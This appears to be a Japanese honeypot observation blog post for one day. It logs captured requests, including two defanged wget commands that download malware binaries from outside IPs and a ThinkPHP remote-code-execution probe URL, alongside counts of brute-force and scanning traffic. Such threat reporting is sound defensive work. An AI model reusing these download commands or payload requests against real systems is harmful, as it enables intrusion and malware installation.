WOWHoneypot観察(261日目)
2019/12/02(月)
トータルは5897件でした。
ハンティングログは以下です。
221.13.203[.]135 wget+hxxp[:]//159.89.182[.]124/ankit/jno.mpsl |
46.33.250[.]251 wget+hxxp[:]//185.172.110[.]220/mipsel |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
5791 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
42 | アクセス | GET / |
13 | WordPressに対するブルートフォース攻撃 | GET /wp-login.php |
12 | WordPressに対するブルートフォース攻撃 | POST /wp-login.php |
8 | WordPressのPingback を狙ったブルートフォース攻撃 | POST /xmlrpc.php |
8 | 調査 | GET /script |
2 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
2 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | クローリング | HEAD /robots.txt |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | 調査 | OPTIONS / |
1 | 不正中継の調査 | HEAD hxxp[:]//112.124.42.80:63435/ |
1 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
1 | 調査 | GET /index.php |
1 | Silverlightのドメイン間ポリシーファイルの調査 | GET /clientaccesspolicy.xml |
1 | Kubernetesの調査 | GET /api/v1/namespaces/default/pods |
1 | WordPressの調査 | GET /config.php |
1 | WordPressの調査 | GET /admin/config.php |
1 | WordPressの調査 | GET ///wp-json/wp/v2/users/ |
1 | WordPressの調査 | GET ///?author=1 |